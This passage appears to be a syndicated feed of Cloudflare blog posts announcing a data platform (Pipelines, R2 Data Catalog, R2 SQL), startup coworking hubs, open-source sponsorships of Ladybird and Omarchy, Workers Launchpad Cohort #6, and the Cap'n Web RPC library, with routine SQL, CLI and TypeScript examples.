Helping build a better Internet has always been about more than just technology. Like the announcements about interns or working together in our offices, the community of people behind helping build a better Internet matters to its future. This week, we rolled out our most ambitious set of initiatives ever to support the builders, founders, and students who are creating the future.

For founders and startups, we are thrilled to welcome Cohort #6 to the Workers Launchpad, our accelerator program that gives early-stage companies the resources they need to scale. But we’re not stopping there. We’re opening our doors, literally, by launching new physical hubs for startups in our San Francisco, Austin, London, and Lisbon offices. These spaces will provide access to mentorship, resources, and a community of fellow builders.

We’re also investing in the next generation of talent. We announced free access to the Cloudflare developer platform for all students, giving them the tools to learn and experiment without limits. To provide a path from the classroom to the industry, we also announced our goal to hire 1,111 interns in 2026 — our biggest commitment yet to fostering future tech leaders.

And because a better Internet is for everyone, we’re extending our support to non-profits and public-interest organizations, offering them free access to our production-grade developer tools, so they can focus on their missions.

Whether you’re a founder with a big idea, a student just getting started, or a team working for a cause you believe in, we want to help you succeed.

Until next year

Thank you to our customers, our community, and the millions of developers who trust us to help them build, secure, and accelerate the Internet. Your curiosity and feedback drive our innovation.

It’s been an incredible 15 years. And as always, we’re just getting started!

Announcing the Cloudflare Data Platform: ingest, store, and query your data directly on Cloudflare

Post Syndicated from Micah Wylde original https://blog.cloudflare.com/cloudflare-data-platform/

For Developer Week in April 2025, we announced the public beta of R2 Data Catalog, a fully managed Apache Iceberg catalog on top of Cloudflare R2 object storage. Today, we are building on that foundation with three launches:

  • Cloudflare Pipelines receives events sent via Workers or HTTP, transforms them with SQL, and ingests them into Iceberg or as files on R2

  • R2 Data Catalog manages the Iceberg metadata and now performs ongoing maintenance, including compaction, to improve query performance

  • R2 SQL is our in-house distributed SQL engine, designed to perform petabyte-scale queries over your data in R2

Together, these products make up the Cloudflare Data Platform, a complete solution for ingesting, storing, and querying analytical data tables.

Like all Cloudflare Developer Platform products, they run on our global compute infrastructure. They’re built around open standards and interoperability. That means that you can bring your own Iceberg query engine — whether that’s PyIceberg, DuckDB, or Spark — connect with other platforms like Databricks and Snowflake — and pay no egress fees to access your data.

Analytical data is critical for modern companies. It allows you to understand your user’s behavior, your company’s performance, and alerts you to issues. But traditional data infrastructure is expensive and hard to operate, requiring fixed cloud infrastructure and in-house expertise. We built the Cloudflare Data Platform to be easy enough for anyone to use with affordable, usage-based pricing.

If you’re ready to get started now, follow the Data Platform tutorial for a step-by-step guide through creating a Pipeline that processes and delivers events to an R2 Data Catalog table, which can then be queried with R2 SQL. Or read on to learn about how we got here and how all of this works.

How did we end up building a Data Platform?

We launched R2 Object Storage in 2021 with a radical pricing strategy: no egress fees — the bandwidth costs that traditional cloud providers charge to get data out — effectively ransoming your data. This was possible because we had already built one of the largest global networks, interconnecting with thousands of ISPs, cloud services, and other enterprises.

Object storage powers a wide range of use cases, from media to static assets to AI training data. But over time, we’ve seen an increasing number of companies using open data and table formats to store their analytical data warehouses in R2.

The technology that enables this is Apache Iceberg. Iceberg is a table format, which provides database-like capabilities (including updates, ACID transactions, and schema evolution) on top of data files in object storage. In other words, it’s a metadata layer that tells clients which data files make up a particular logical table, what the schemas are, and how to efficiently query them.

The adoption of Iceberg across the industry meant users were no longer locked-in to one query engine. But egress fees still make it cost-prohibitive to query data across regions and clouds. R2, with zero-cost egress, solves that problem — users would no longer be locked-in to their clouds either. They could store their data in a vendor-neutral location and let teams use whatever query engine made sense for their data and query patterns.

But users still had to manage all of the metadata and other infrastructure themselves. We realized there was an opportunity for us to solve a major pain point and reduce the friction of storing data lakes on R2. This became R2 Data Catalog, our managed Iceberg catalog.

With the data stored on R2 and metadata managed, that still left a few gaps for users to solve.

How do you get data into your Iceberg tables? Once it’s there, how do you optimize for query performance? And how do you actually get value from your data without needing to self-host a query engine or use another cloud platform?

In the rest of this post, we’ll walk through how the three products that make up the Data Platform solve these challenges.

Cloudflare Pipelines

Analytical data tables are made up of events, things that happened at a particular point in time. They might come from server logs, mobile applications, or IoT devices, and are encoded in data formats like JSON, Avro, or Protobuf. They ideally have a schema — a standardized set of fields — but might just be whatever a particular team thought to throw in there.

But before you can query your events with Iceberg, they need to be ingested, structured according to a schema, and written into object storage. This is the role of Cloudflare Pipelines.

Built on top of Arroyo, a stream processing engine we acquired earlier this year, Pipelines receives events, transforms them with SQL queries, and sinks them to R2 and R2 Data Catalog.

Pipelines is organized around three central objects:

Streams are how you get data into Cloudflare. They’re durable, buffered queues that receive events and store them for processing. Streams can accept events in two ways: via an HTTP endpoint or from a Cloudflare Worker binding.

Sinks define the destination for your data. We support ingesting into R2 Data Catalog, as well as writing raw files to R2 as JSON or Apache Parquet. Sinks can be configured to frequently write files, prioritizing low-latency ingestion, or to write less frequent, larger files to get better query performance. In either case, ingestion is exactly-once, which means that we will never duplicate or drop events on their way to R2.

Pipelines connect streams and sinks via SQL transformations, which can modify events before writing them to storage. This enables you to shift left, pushing validation, schematization, and processing to your ingestion layer to make your queries easy, fast, and correct.


For example, here’s a pipeline that ingests events from a clickstream data source and writes them to Iceberg:

INSERT into events_table
SELECT
  user_id,
  lower(event) AS event_type,
  to_timestamp_micros(ts_us) AS event_time,
  regexp_match(url, '^https?://([^/]+)')[1]  AS domain,
  url,
  referrer,
  user_agent
FROM events_json
WHERE event = 'page_view'
  AND NOT regexp_like(user_agent, '(?i)bot|spider');

SQL transformations are very powerful and give you full control over how data is structured and written into the table. For example, you can

  • Schematize and normalize your data, even using JSON functions to extract fields from arbitrary JSON

  • Filter out events or split them into separate tables with their own schemas

  • Redact sensitive information before storage with regexes

  • Unroll nested arrays and objects into separate events

Initially, Pipelines supports stateless transformations. In the future, we’ll leverage more of Arroyo’s stateful processing capabilities to support aggregations, incrementally-updated materialized views, and joins.

Cloudflare Pipelines is available today in open beta. You can create a pipeline using the dashboard, Wrangler, or the REST API. To get started, check out our developer docs.

We aren’t currently billing for Pipelines during the open beta. However, R2 storage and operations incurred by sinks writing data to R2 are billed at standard rates. When we start billing, we anticipate charging based on the amount of data read, the amount of data processed via SQL transformations, and data delivered.

R2 Data Catalog

We launched the open beta of R2 Data Catalog in April and have been amazed by the response. Query engines like DuckDB have added native support, and we’ve seen useful integrations like marimo notebooks.

It makes getting started with Iceberg easy. There’s no need to set up a database cluster, connect to object storage, or manage any infrastructure. You can create a catalog with a couple of Wrangler commands:

$ npx wrangler bucket create mycatalog 
$ npx wrangler r2 bucket catalog enable mycatalog

This provisions a data lake that can scale to petabytes of storage, queryable by whatever engine you want to use with zero egress fees.

But just storing the data isn’t enough. Over time, as data is ingested, the number of underlying data files that make up a table will grow, leading to slower and slower query performance.

This is a particular problem with low-latency ingestion, where the goal is to have events queryable as quickly as possible. Writing data frequently means the files are smaller, and there are more of them. Each file needed for a query has to be listed, downloaded, and read. The overhead of too many small files can dominate the total query time.

The solution is compaction, a periodic maintenance operation performed automatically by the catalog. Compaction rewrites small files into larger files which reduces metadata overhead and increases query performance. 

Today we are launching compaction support in R2 Data Catalog. Enabling it for your catalog is as easy as:

$ npx wrangler r2 bucket catalog compaction enable mycatalog

We’re starting with support for small-file compaction, and will expand to additional compaction strategies in the future. Check out the compaction documentation to learn more about how it works and how to enable it.

At this time, during open beta, we aren’t billing for R2 Data Catalog. Below is our current thinking on future pricing:

Pricing*

R2 storage

For standard storage class

$0.015 per GB-month (no change)

R2 Class A operations

$4.50 per million operations (no change)

R2 Class B operations

$0.36 per million operations (no change)

Data Catalog operations

e.g., create table, get table metadata, update table properties

$9.00 per million catalog operations

Data Catalog compaction data processed

$0.005 per GB processed

$2.00 per million objects processed

Data egress

$0 (no change, always free)

*prices subject to change prior to General Availability

We will provide at least 30 days notice before billing starts or if anything changes.

R2 SQL

Having data in R2 Data Catalog is only the first step; the real goal is getting insights and value from it. Traditionally, that means setting up and managing DuckDB, Spark, Trino, or another query engine, adding a layer of operational overhead between you and those insights. What if instead you could run queries directly on Cloudflare?

Now you can. We’ve built a query engine specifically designed for R2 Data Catalog and Cloudflare’s edge infrastructure. We call it R2 SQL, and it’s available today as an open beta.

With Wrangler, running a query on an R2 Data Catalog table is as easy as

$ npx wrangler r2 sql query "{WAREHOUSE}" "\
  SELECT user_id, url FROM events \
  WHERE domain = 'mywebsite.com'"

Cloudflare’s ability to schedule compute anywhere on its global network is the foundation of R2 SQL’s design. This lets us process data directly where it lives, instead of requiring you to manage centralized clusters for your analytical workloads.

R2 SQL is tightly integrated with R2 Data Catalog and R2, which allows the query planner to go beyond simple storage scanning and make deep use of the rich statistics stored in the R2 Data Catalog metadata. This provides a powerful foundation for a new class of query optimizations, such as auxiliary indexes or enabling more complex analytical functions in the future.

The result is a fully serverless experience for users. You can focus on your SQL without needing a deep understanding of how the engine operates. If you are interested in how R2 SQL works, the team has written a deep dive into how R2 SQL’s distributed query engine works at scale.

The open beta is an early preview of R2 SQL querying capabilities, and is initially focused around filter queries. Over time, we will be expanding its capabilities to cover more SQL features, like complex aggregations.

We’re excited to see what our users do with R2 SQL. To try it out, see the documentation and tutorials. During the beta, R2 SQL usage is not currently billed, but R2 storage and operations incurred by queries are billed at standard rates. We plan to charge for the volume of data scanned by queries in the future and will provide notice before billing begins.

Wrapping up

Today, you can use the Cloudflare Data Platform to ingest events into R2 Data Catalog and query them via R2 SQL. In the first half of 2026, we’ll be expanding on the capabilities in all of these products, including:

  • Integration with Logpush, so you can transform, store, and query your logs directly within Cloudflare

  • User-defined functions via Workers, and stateful processing support for streaming transformations

  • Expanding the featureset of R2 SQL to cover aggregations and joins

In the meantime, you can get started with the Cloudflare Data Platform by following the tutorial to create an end-to-end analytical data system, from ingestion with Pipelines, through storage in R2 Data Catalog, and querying with R2 SQL. 

We’re excited to see what you build! Come share your feedback with us on our Developer Discord.

Come build with us: Cloudflare’s new hubs for startups

Post Syndicated from Christopher Rotas original https://blog.cloudflare.com/new-hubs-for-startups/

Cloudflare’s offices bring together builders in some of the world’s most popular technology hubs. We have a long history of using those spaces for one-off events and meet ups over the last fifteen years, but we want to do more. Starting in 2026, we plan to open the doors of our offices routinely to startups and builders from outside of our team who need the space to collaborate, meet new people, or just type away at a keyboard in a new (and beautiful) location.

What are our offices meant to be?

Prior to 2020, we expected essentially every team member of Cloudflare to be present in one of our offices five days a week. That worked well for us and helped facilitate the launch of dozens of technologies as well as a community and culture that defined who we are.

Like every other team on the planet, the COVID pandemic forced us to revisit that approach. We used the time to think about what our offices could be, in a world where not every team member showed up every day of the week. While we decided we would be open to remote and hybrid work, we still felt like some of our best work was done in person together. The goal became building spaces that encouraged team members to be present.

Several hard hats and a few leases later, we’ve created a network of offices around the world designed to evolve with the way people work. These spaces aren’t just places to sit — they’re environments that empower people to do their best work — whether that means quiet focus, creative problem-solving, or lively collaboration. From a library tucked into a quiet zone in our waterfront Lisbon office, to the high-ceilinged collaboration areas in the heart of Austin, each office reflects our belief that great spaces support diverse working styles and help teams thrive together.

Our offices are meant to connect our teams, and we believe that by opening our doors to the wider community, we can foster even more innovation and help new companies collaborate better. Cloudflare has always been a hub for builders, and now we’re making that commitment official by welcoming startups into our physical spaces.

Why make them even more open to the community?

Our spaces have served as hosts to community events since the earliest days of Cloudflare. We have brought together just about every group from hackathons to language meet-ups to university orientation sessions. Cloudflare exists to help build a better Internet and in many cases a better digital environment starts with relationships built in a real life environment.

One of the most common pieces of feedback we have received in the last few years after hosting these events is “I really miss connecting with people like this.” And we hear that most often from small teams in the earliest stages of their journey. In the last few years as the start-ups we support with our platform increasingly begin remote-first and only open dedicated spaces in later stages of their growth.

We know that building a company can be a lonely path. We have helped over the last several years by providing a robust free plan and a comprehensive start-up program, but we think we can do more.

Cloudflare’s network supports a significant percentage of the Internet and, as you would expect, the Internet follows the sun. More people use it during the daytime than at night, meaning our data center utilization peaks in specific times of the day. We take advantage of that pattern to run services that are less latency-sensitive in regions overnight.

Our physical locations follow a similar pattern. Utilization resembles a bell curve with Tuesdays, Wednesdays, and Thursdays seeing a lot of traffic while Mondays and Fridays tend to be quieter. Like our CPUs at night, we think we can use that excess capacity to help build a better Internet by giving builders a space to congregate and helping our team connect with more of our users.

How will this work?

Beginning in January of 2026, we plan to make our office locations available to a capped number of external visitors as all-day coworking spaces on select days of each week. We will provide a registration process (more on that below) and set some ground rules. To start, we plan to expand this offering to San Francisco, Austin, London, and Lisbon.

When external visitors arrive, they’ll have access to our common spaces to bring together their teams or just get some work done by themselves. No mandatory talks or obligations. Just fantastic working spaces available to use at no cost.

How can you participate?

We will provide more details in the next few weeks, but the general structure will be based on the following steps.

  1. Enroll in the Cloudflare for Startups Program. Bonus if you are a Workers Launchpad participant or alumni.

  2. Sit tight for now. We will email participating Startup Program customers first to participate with a form requesting office access.

  3. Once the form is filled out, a member of our team will reach out after. If you want to get a head start, fill out the form here.

  4. We plan to roll this out on a cohort basis. Once approved and all requirements are met, register your visit (and that of any additional team members) at least three business days prior to the date requested.

  5. Respect our working spaces as you would your own.

What’s next?

We hope to expand to other locations in the future. Want to get to the front of the line? Sign up for our Startup program here today and we will reach out to Startup Program participants before we roll out the program.

Supporting the future of the open web: Cloudflare is sponsoring Ladybird and Omarchy

Post Syndicated from Mari Galicer original https://blog.cloudflare.com/supporting-the-future-of-the-open-web/

At Cloudflare, we believe that helping build a better Internet means encouraging a healthy ecosystem of options for how people can connect safely and quickly to the resources they need. Sometimes that means we tackle immense, Internet-scale problems with established partners. And sometimes that means we support and partner with fantastic open teams taking big bets on the next generation of tools.

To that end, today we are excited to announce our support of two independent, open source projects: Ladybird, an ambitious project to build a completely independent browser from the ground up, and Omarchy, an opinionated Arch Linux setup for developers. 

Two open source projects strengthening the open Internet 

Cloudflare has a long history of supporting open-source software – both through our own projects shared with the community and external projects that we support. We see our sponsorship of Ladybird and Omarchy as a natural extension of these efforts in a moment where energy for a diverse ecosystem is needed more than ever.  

Ladybird, a new and independent browser 

Most of us spend a significant amount of time using a web browser –  in fact, you’re probably using one to read this blog! The beauty of browsers is that they help users experience the open Internet, giving you access to everything from the largest news publications in the world to a tiny website hosted on a Raspberry Pi.  

Unlike dedicated apps, browsers reduce the barriers to building an audience for new services and communities on the Internet. If you are launching something new, you can offer it through a browser in a world where most people have absolutely zero desire to install an app just to try something out. Browsers help encourage competition and new ideas on the open web.

While the openness of how browsers work has led to an explosive growth of services on the Internet, browsers themselves have consolidated to a tiny handful of viable options. There’s a high probability you’re reading this on a Chromium-based browser, like Google’s Chrome, along with about 65% of users on the Internet. However, that consolidation has also scared off new entrants in the space. If all browsers ship on the same operating systems, powered by the same underlying technology, we lose out on potential privacy, security and performance innovations that could benefit developers and everyday Internet users. 


A screenshot of Cloudflare Workers developer docs in Ladybird 

This is where Ladybird comes in: it’s not Chromium based – everything is built from scratch. The Ladybird project has two main components: LibWeb, a brand-new rendering engine, and LibJS, a brand-new JavaScript engine with its own parser, interpreter, and bytecode execution engine. 

Building an engine that can correctly and securely render the modern web is a monumental task that requires deep technical expertise and navigating decades of specifications governed by standards bodies like the W3C and WHATWG. And because Ladybird implements these standards directly, it also stress-tests them in practice. Along the way, the project has found, reported, and sometimes fixed countless issues in the specifications themselves, contributions that strengthen the entire web platform for developers, browser vendors, and anyone who may attempt to build a browser in the future.

Whether to build something from scratch or not is a perennial source of debate between software engineers, but absent the pressures of revenue or special interests, we’re excited about the ways Ladybird will prioritize privacy, performance, and security, potentially in novel ways that will influence the entire ecosystem.


A screenshot of the Omarchy development environment

Omarchy, an independent development environment 

Developers deserve choice, too. Beyond the browser, a developer’s operating system and environment is where they spend a ton of time – and where a few big players have become the dominant choice. Omarchy challenges this by providing a complete, opinionated Arch Linux distribution that transforms a bare installation into a modern development workstation that developers are excited about.

Perfecting one’s development environment can be a career-long art, but learning how to do so shouldn’t be a barrier to beginning to code. The beauty of Omarchy is that it makes Linux approachable to more developers by doing most of the setup for them, making it look good, and then making it configurable. Omarchy provides most of the tools developers need – like Neovim, Docker, and Git – out of the box, and tons of other features.

At its core, Omarchy embraces Linux for all of its complexity and configurability, and makes a version of it that is accessible and fun to use for developers that don’t have a deep background in operating systems. Projects like this ensure that a powerful, independent Linux desktop remains a compelling choice for people building the next generation of applications and Internet infrastructure. 

Our support comes with no strings attached  

We want to be very clear here: we are supporting these projects because we believe the Internet can be better if these projects, and more like them, succeed. No requirement to use our technology stack or any arrangement like that. We are happy to partner with great teams like Ladybird and Omarchy simply because we believe that our missions have real overlap.

Notes from the teams

Ladybird is still in its early days, with an alpha release planned for 2026, but we encourage anyone who is interested to consider contributing to the open source codebase as they prepare for launch.

“Cloudflare knows what it means to build critical web infrastructure on the server side. With Ladybird, we’re tackling the near-monoculture on the client side, because we believe it needs multiple implementations to stay healthy, and we’re extremely thankful for their support in that mission.”

Andreas Kling, Founder, Ladybird  

Omarchy 3.0 was released just last week with faster installation and increased Macbook compatibility, so if you’ve been Linux-curious for a while now, we encourage you to try it out!

“Cloudflare’s support of Omarchy has ensured we have the fastest ISO and package delivery from wherever you are in the world. Without a need to manually configure mirrors or deal with torrents. The combo of a super CDN, great R2 storage, and the best DDoS shield in the business has been a huge help for the project.”

David Heinemeier Hansson, Creator of Omarchy and Ruby on Rails

A better Internet is one where people have more choice in how they browse and develop new software. We’re incredibly excited about the potential of Ladybird, Omarchy, and other audacious projects that support a free and open Internet.

A Lookback at Workers Launchpad and a Warm Welcome to Cohort #6

Post Syndicated from Christopher Rotas original https://blog.cloudflare.com/workers-launchpad-006/

Imagine you have an idea for an AI application that you’re really excited about — but the cost of GPU time and complex infrastructure stops you in your tracks before you even write a line of code. This is the problem founders everywhere face: balancing high infrastructure costs with the need to innovate and scale quickly.

Our startup programs remove those barriers, so founders can focus on what matters the most: building products, finding customers, and growing a business. Cloudflare for Startups launched in 2018 to provide enterprise-level application security and performance services to growing startups. As we built out our Developer Platform, we pivoted last year to offer founders up to $250,000 in cloud credits to build on our Developer Platform for up to one year.

During Birthday Week 2022, we announced our Cloudflare Workers Launchpad Program with an initial $1.25 billion in potential funding for startups building on Cloudflare Workers, made possible through partnerships with 26 leading venture capital (VC) firms. Within months, we expanded VC-backed funding to $2 billion.

Since 2022, we’ve welcomed 145 startups from 23 countries. These startups are solving problems across verticals such as AI and machine learning, developer tools, 3D design, cloud infrastructure, data tools, ad tech, media, logistics, finance, and other industries. We’re especially proud of the female founder representation in recent cohorts — with nearly a third of companies in Cohort #5 run by a female founder. 

Participants engaged in bootcamp sessions with Cloudflare leadership and product teams, covering key topics like product pricing and scaling sales. Startups received hands-on design support from our Solutions Architecture team, empowering these builders to build and scale their full-stack applications on the Cloudflare network. We facilitate countless introductions across the VC network, and are happy to see funding and M&A activity as these startups scale. Cloudflare also identified direct opportunities and acquired Nefeli Networks (Cohort #2) and Outerbase (Cohort #4).

Check out what Launchpad alumni have to say about their experience in the program:

Langbase (Cohort #3)
Ship hyper-personalized AI apps to any LLM, any data, any developer in seconds


“For Langbase, the best part about Workers Launchpad was the incredible support from Cloudflare’s internal teams. It wasn’t just about access to infrastructure; it was the hands-on migration help, rapid feedback loops, and genuine partnership from engineers, product folks, and the broader Cloudflare community. That human support empowered us to iterate faster, solve hard problems, and truly feel like we were building something impactful together. 

Langbase has quickly become one of the most powerful serverless AI clouds for building and deploying AI agents. We process 700 TB of agent memory and 1.2 billion AI agent runs a month. Langbase is an agent lab, and we’ve also launched a coding agent called Command.new, an “agent of agents” that can take your prompts and turn them into production-ready agents by provisioning infrastructure and writing the agent’s code in TypeScript.

My advice for anyone joining future Workers Launchpad cohorts is to use every resource offered. Engage deeply with the Cloudflare teams, ask for feedback early and often, and be open to sharing your challenges and wins, especially in the Discord community, which is super helpful. Cloudflare listens closely to participant feedback and genuinely wants to help startups succeed. Treat it as a two-way conversation and a collaborative growth opportunity. This mindset is what unlocks the real power of the program.”

-Ahmad Awais, Founder & CEO of Langbase

Sherpo.io (Cohort #4)
AI-first no-code platform to build and sell digital content


“Since joining Cohort #4, we’ve exited closed beta and expanded our product suite for content creators. Today, more than 3,000 creators worldwide power their digital product stores with Sherpo, while we continue building and scaling.

We learned as much from fellow startups as from Cloudflare during office hours and sessions, and we got to meet incredible people along the way, including Cloudflare’s CSO, Stephanie Cohen.

For anyone joining, attend every session, listen closely, and ask questions—they’re incredibly valuable. Building on Workers has given us a real advantage, and the team’s pace of innovation only compounds it.”

-Giacomo Di Pinto, Co-Founder & CEO of Sherpo.io

Tightknit AI (Cohort #4)
Embedded community engagement platform built for SaaS


“Beyond the cloud credits that Launchpad provided us to play with every Cloudflare product, the most important aspect of the program we found was our ability to access (and even contribute) to the product roadmap. We were able to connect with product managers and solutions architects that have helped us take our work to the next level.

We’ve recently passed half a million users on the platform and have started to close not just the top Saas businesses in the world, but the top AI companies in the world, including Clay, Gamma, Lindy, beehiiv, Amplitude, Mixpanel, and so many more. The best part is that 100% of application logic is still powered by Cloudflare!

The biggest piece of advice for anyone starting the cohort is attend office hours as much as you can. I can’t tell you how many times we were able to unblock ourselves or even provide real product feedback/bug reports. It was amazing to meet the rest of the cohort and solve problems together that ordinary Cloudflare developers just do not face. So my advice is don’t miss the office hours. They were by far the most valuable part of our experience.”

-Zach Hawtof, Co-Founder & CEO of Tightknit.ai

Render Better (Cohort #4)
Increase e-commerce revenue by automatically optimizing your site speed


“My favorite part of the Launchpad was the community and the leaders who brought us together. The startup and product teams provided expert advice on both business and technical questions through meetings, 1-on-1s, and Discord. Many of them were former founders, so they understood what we were going through and helped us get what we needed. They were crucial in helping us get unstuck, whether we were using obscure Cloudflare features or needed connections to the right people.

I met a lot of great founders who are on the same journey and face the same struggles. Watching them grow was motivating and gave us a morale boost to keep up the fast pace a startup needs.

Since Launchpad, Render Better has scaled to 60 automated site speed optimizations, helping e-commerce sites convert 20% higher powered by Cloudflare Workers. Our growth accelerated after the program, and we’re now optimizing traffic for some of the biggest e-commerce brands like PSD, Polywood, and Self-Portrait. Render Better now processes 5 billion requests each month, made possible by Cloudflare’s global edge network and Workers platform.

Launchpad is truly just that: Cloudflare gives you the resources and attention to help you grow from an idea into something big. Build fast and take as much advantage of the fuel they give you to fly your startup rocket!”

-James Koshigoe, Founder & CEO of Render Better

Launchpad is growing into more than just a program. It is a community of builders and innovators showing what is possible with Cloudflare’s network behind them. With that foundation, we are excited to introduce the next group of entrepreneurs taking the stage in Cohort #6.

Introducing Cohort #6

Before introducing Cohort #6, we want to give one last shout out to Cohort #5. As Launchpad alumni, we cannot wait to see what you achieve. If you didn’t get a chance to check out Cohort #5’s demo day, watch  the recording here.

With that, help us give a warm welcome to the participants of Workers Launchpad Cohort #6:


We’re excited to see what Cohort #6 accomplishes. Follow @CloudflareDev on X and join our Developer Discord to stay updated on their progress. If you’re a startup interested in joining Workers Launchpad, applications for Cohort #7 are now open.

Company

About

Allegory

AI-Powered platform connecting impact to funding

Apgio

Mobile app localization platform with smart AI translations and workflow tooling

Atlas

Building the operating system for restaurants

Bloctave

Configurable rights management platform with instantaneous royalty distribution

Byte

AI code auditor that translates codebases into natural language

Calljmp

Agentic AI backend for apps

Centian

MCP-powered AI Agent middleware for successful and compliant operations

Divinci AI

Release management and quality assurance for custom LLMs

DXOS

An extensible open-core super-app designed to be your team’s brain

Fidsy

AI-native, code-free orchestration platform providing automated data privacy for all AI & Data workflows

Fluentos

Create popups your customers won’t hate

Framebird

Media sharing solution for creatives featuring modern galleries and client review tools

GoPersonal

AI to build, personalize, and manage your ecommerce business

Horizon

Short-form & agentic experiences for apps and websites

Kenobi

Personalizing the Internet with custom web experiences

MonetizationOS

Intelligent decisioning at the edge, for monetising the human and machine web

Natively.dev

Build your dream mobile app using AI, enabling users to take directly to App Stores

Outhire

AI agent automating phone screens without bias

Outsession

Privacy-first AI tools that preserve the therapeutic relationship

Phleid

Direct-to-wallet mobile passes and notifications platform

PlaySafe (By Doge Labs)

Makes voice-chat communities safer by detecting and blocking harassment in real time

Ploton

Help small business businesses grow by building workflows through natural conversation, not complex tools

Project Karna

Multimodal, continuous identity for the post-GenAI enterprise

Schematic

Simplify monetization for GTM teams, allowing them to control pricing, packaging, and entitlements without code changes

SonicLinker

Turn AI-agent visits into revenue

SuiteOp

All-in-one platform to streamline hospitality operations and guest services

SuprSend

Multi-channel notification engine for product and platform teams

Yara AI

Ethical, memory-rich AI for mental health at scale

Zephyr Cloud

Fastest way to go from idea to production

Zero Email

AI native email client that manages your inbox so you don’t have to

Cap’n Web: a new RPC system for browsers and web servers

Post Syndicated from Kenton Varda original https://blog.cloudflare.com/capnweb-javascript-rpc-library/

Allow us to introduce Cap’n Web, an RPC protocol and implementation in pure TypeScript.

Cap’n Web is a spiritual sibling to Cap’n Proto, an RPC protocol I (Kenton) created a decade ago, but designed to play nice in the web stack. That means:

  • Like Cap’n Proto, it is an object-capability protocol. (“Cap’n” is short for “capabilities and”.) We’ll get into this more below, but it’s incredibly powerful.

  • Unlike Cap’n Proto, Cap’n Web has no schemas. In fact, it has almost no boilerplate whatsoever. This means it works more like the JavaScript-native RPC system in Cloudflare Workers.

  • That said, it integrates nicely with TypeScript.

  • Also unlike Cap’n Proto, Cap’n Web’s underlying serialization is human-readable. In fact, it’s just JSON, with a little pre-/post-processing.

  • It works over HTTP, WebSocket, and postMessage() out-of-the-box, with the ability to extend it to other transports easily.

  • It works in all major browsers, Cloudflare Workers, Node.js, and other modern JavaScript runtimes.

  • The whole thing compresses (minify+gzip) to under 10 kB with no dependencies.

  • It’s open source under the MIT license.

Cap’n Web is more expressive than almost every other RPC system, because it implements an object-capability RPC model. That means it:

  • Supports bidirectional calling. The client can call the server, and the server can also call the client.

  • Supports passing functions by reference: If you pass a function over RPC, the recipient receives a “stub”. When they call the stub, they actually make an RPC back to you, invoking the function where it was created. This is how bidirectional calling happens: the client passes a callback to the server, and then the server can call it later.

  • Similarly, supports passing objects by reference: If a class extends the special marker type RpcTarget, then instances of that class are passed by reference, with method calls calling back to the location where the object was created.

  • Supports promise pipelining. When you start an RPC, you get back a promise. Instead of awaiting it, you can immediately use the promise in dependent RPCs, thus performing a chain of calls in a single network round trip.

  • Supports capability-based security patterns.

In short, Cap’n Web lets you design RPC interfaces the way you’d design regular JavaScript APIs – while still acknowledging and compensating for network latency.

The best part is, Cap’n Web is absolutely trivial to set up.

A client looks like this:

import { newWebSocketRpcSession } from "capnweb";

// One-line setup.
let api = newWebSocketRpcSession("wss://example.com/api");

// Call a method on the server!
let result = await api.hello("World");

console.log(result);

And here’s a complete Cloudflare Worker implementing an RPC server:

import { RpcTarget, newWorkersRpcResponse } from "capnweb";

// This is the server implementation.
class MyApiServer extends RpcTarget {
  hello(name) {
    return `Hello, ${name}!`
  }
}

// Standard Workers HTTP handler.
export default {
  fetch(request, env, ctx) {
    // Parse URL for routing.
    let url = new URL(request.url);

    // Serve API at `/api`.
    if (url.pathname === "/api") {
      return newWorkersRpcResponse(request, new MyApiServer());
    }

    // You could serve other endpoints here...
    return new Response("Not found", {status: 404});
  }
}

That’s it. That’s the app.

  • You can add more methods to MyApiServer, and call them from the client.

  • You can have the client pass a callback function to the server, and then the server can just call it.

  • You can define a TypeScript interface for your API, and easily apply it to the client and server.

It just works.

Why RPC? (And what is RPC anyway?)

Remote Procedure Calls (RPC) are a way of expressing communications between two programs over a network. Without RPC, you might communicate using a protocol like HTTP. With HTTP, though, you must format and parse your communications as an HTTP request and response, perhaps designed in REST style. RPC systems try to make communications look like a regular function call instead, as if you were calling a library rather than a remote service. The RPC system provides a “stub” object on the client side which stands in for the real server-side object. When a method is called on the stub, the RPC system figures out how to serialize and transmit the parameters to the server, invoke the method on the server, and then transmit the return value back.

The merits of RPC have been subject to a great deal of debate. RPC is often accused of committing many of the fallacies of distributed computing.

But this reputation is outdated. When RPC was first invented some 40 years ago, async programming barely existed. We did not have Promises, much less async and await. Early RPC was synchronous: calls would block the calling thread waiting for a reply. At best, latency made the program slow. At worst, network failures would hang or crash the program. No wonder it was deemed “broken”.

Things are different today. We have Promise and async and await, and we can throw exceptions on network failures. We even understand how RPCs can be pipelined so that a chain of calls takes only one network round trip. Many large distributed systems you likely use every day are built on RPC. It works.

The fact is, RPC fits the programming model we’re used to. Every programmer is trained to think in terms of APIs composed of function calls, not in terms of byte stream protocols nor even REST. Using RPC frees you from the need to constantly translate between mental models, allowing you to move faster.

When should you use Cap’n Web?

Cap’n Web is useful anywhere where you have two JavaScript applications speaking to each other over a network, including client-to-server and microservice-to-microservice scenarios. However, it is particularly well-suited to interactive web applications with real-time collaborative features, as well as modeling interactions over complex security boundaries.

Cap’n Web is still new and experimental, so for now, a willingness to live on the cutting edge may also be required!

Features, features, features…

Here’s some more things you can do with Cap’n Web.

HTTP batch mode

Sometimes a WebSocket connection is a bit too heavyweight. What if you just want to make a quick one-time batch of calls, but don’t need an ongoing connection?

For that, Cap’n Web supports HTTP batch mode:

import { newHttpBatchRpcSession } from "capnweb";

let batch = newHttpBatchRpcSession("https://example.com/api");

let result = await batch.hello("World");

console.log(result);

(The server is exactly the same as before.)

Note that once you’ve awaited an RPC in the batch, the batch is done, and all the remote references received through it become broken. To make more calls, you need to start over with a new batch. However, you can make multiple calls in a single batch:

let batch = newHttpBatchRpcSession("https://example.com/api");

// We can call make multiple calls, as long as we await them all at once.
let promise1 = batch.hello("Alice");
let promise2 = batch.hello("Bob");

let [result1, result2] = await Promise.all([promise1, promise2]);

console.log(result1);
console.log(result2);

And that brings us to another feature…

Chained calls (Promise Pipelining)

Here’s where things get magical.

In both batch mode and WebSocket mode, you can make a call that depends on the result of another call, without waiting for the first call to finish. In batch mode, that means you can, in a single batch, call a method, then use its result in another call. The entire batch still requires only one network round trip.

For example, say your API is:

class MyApiServer extends RpcTarget {
  getMyName() {
    return "Alice";
  }

  hello(name) {
    return `Hello, ${name}!`
  }
}

You can do:

let namePromise = batch.getMyName();
let result = await batch.hello(namePromise);

console.log(result);

